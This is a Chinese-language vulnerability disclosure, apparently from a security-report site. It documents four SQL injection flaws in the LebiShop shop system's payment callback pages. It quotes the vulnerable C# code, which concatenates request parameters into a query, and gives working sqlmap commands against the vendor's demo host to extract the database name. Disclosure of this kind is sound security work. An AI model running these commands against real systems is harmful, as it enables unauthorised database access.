LebiShop系统sql注入四（四处注入）

### 简要描述： LebiShop商城系统最新版SQL注入 四处 demo站点测试成功 ### 详细说明： 注入一 二 主要漏洞代码一样 ``` http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspx http://demo.lebi.cn/onlinepay/95epay/PayResult.aspx ``` 共同源码如下 ``` protected void Page_Load(object sender, EventArgs e) { this.MerNo = HttpContext.Current.Request.Params["MerNo"].ToString(); this.BillNo = HttpContext.Current.Request.Params["BillNo"].ToString(); //没处理 this.Amount = HttpContext.Current.Request.Params["Amount"].ToString(); this.Succeed = HttpContext.Current.Request.Params["Succeed"].ToString(); this.Result = HttpContext.Current.Request.Params["Result"].ToString(); this.MD5info = HttpContext.Current.Request.Params["MD5info"].ToString(); this.MerRemark = HttpContext.Current.Request.Params["MerRemark"].ToString(); Lebi_OnlinePay onlinePay = Money.GetOnlinePay(this.BillNo); //跟进 if (onlinePay == null) { base.Response.Write("系统错误"); base.Response.End(); } ..... public static Lebi_OnlinePay GetOnlinePay(string code) { return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //存在注入了 } ``` 注入三 ``` http://demo.lebi.cn/onlinepay/kuaiqian/receive.aspx ``` 源码如下 ``` protected void Page_Load(object sender, EventArgs E) { Lebi_OnlinePay onlinePay = Money.GetOnlinePay(base.Request["orderId"].ToString().Trim()); //跟进 if (onlinePay == null) { base.Response.Write("系统错误"); base.Response.End(); } .... public static Lebi_OnlinePay GetOnlinePay(string code) { return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //没处理 同样存在注入 } ``` 注入四 ``` http://demo.lebi.cn/onlinepay/Paypal/ReturnUrl.aspx ``` 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { try { string str = base.Request.Form["txn_id"].ToString(); string str2 = base.Request.Form["payment_status"].ToString(); string str3 = base.Request.Form["payment_date"].ToString(); string str4 = base.Request.Form["item_name"].ToString(); string str5 = base.Request.Form["mc_gross"].ToString(); string code = base.Request.Form["item_number"].ToString(); //没处理 Lebi_OnlinePay onlinePay = Money.GetOnlinePay(code); //跟进 if (onlinePay == null) { base.Response.Write("系统错误"); base.Response.End(); } else { B_Lebi_Currency.GetModel(onlinePay.Currency_id); string str7 = ""; str7 = (((((str7 + "txn_id:" + str + " ") + "payment_status:" + str2 + " ") + "payment_date:" + str3 + " ") + "item_name:" + str4 + " ") + "mc_gross:" + str5 + " ") + "ppitem_number:" + code + " "; if (this.VerifyIPN()) { Order.OnlinePaySuccess(code, "", true); } } } catch (Exception) { } } public static Lebi_OnlinePay GetOnlinePay(string code) { return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //存在注入 } ``` ### 漏洞证明： 注入一 二 sqlmap扫描 ``` sqlmap -u "http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspx" --data "MerNo=1&Amount=1&Succeed=1&Result=1&MD5info=1&MerRemark=1&BillNo=1" -p "BillNo" --dbms "mssql" --current-db --technique=T --time-sec 10 ``` [<img src="https://images.seebug.org/upload/201503/031003269a475b49a41325daadffd8eee3514edc.png" alt="541.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031003269a475b49a41325daadffd8eee3514edc.png) [<img src="https://images.seebug.org/upload/201503/03100337b238b47389f4e5ea8233d8c79a33e32c.png" alt="542.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/03100337b238b47389f4e5ea8233d8c79a33e32c.png) 注入三 sqlmap扫描 ``` sqlmap -u "http://demo.lebi.cn/onlinepay/kuaiqian/receive.aspx" --data "orderId=1" -p "orderId" --dbms "mssql" --current-db --technique=T --time-sec 10 ``` [<img src="https://images.seebug.org/upload/201503/031006285d2505e095b5423c57f1f1342f148fe4.png" alt="543.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031006285d2505e095b5423c57f1f1342f148fe4.png) [<img src="https://images.seebug.org/upload/201503/03101507f81cdfd7091af532ac2e4b3c902cfb4e.png" alt="544.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/03101507f81cdfd7091af532ac2e4b3c902cfb4e.png) 注入四 sqlmap扫描 ``` sqlmap -u "http://demo.lebi.cn/onlinepay/Paypal/ReturnUrl.aspx" --data "txn_id=1&payment_status=1&payment_date=1&item_name=1&mc_gross=1&item_number=1" -p "item_number" --dbms "mssql" --current-db --technique=T --time-sec 10 ``` [<img src="https://images.seebug.org/upload/201503/03101639117d1217db1425175e9c51767ffcaaa4.png" alt="545.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/03101639117d1217db1425175e9c51767ffcaaa4.png) [<img src="https://images.seebug.org/upload/201503/031019453bfa057f2fc15bcfec7aa977c5fdd38b.png" alt="546.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031019453bfa057f2fc15bcfec7aa977c5fdd38b.png)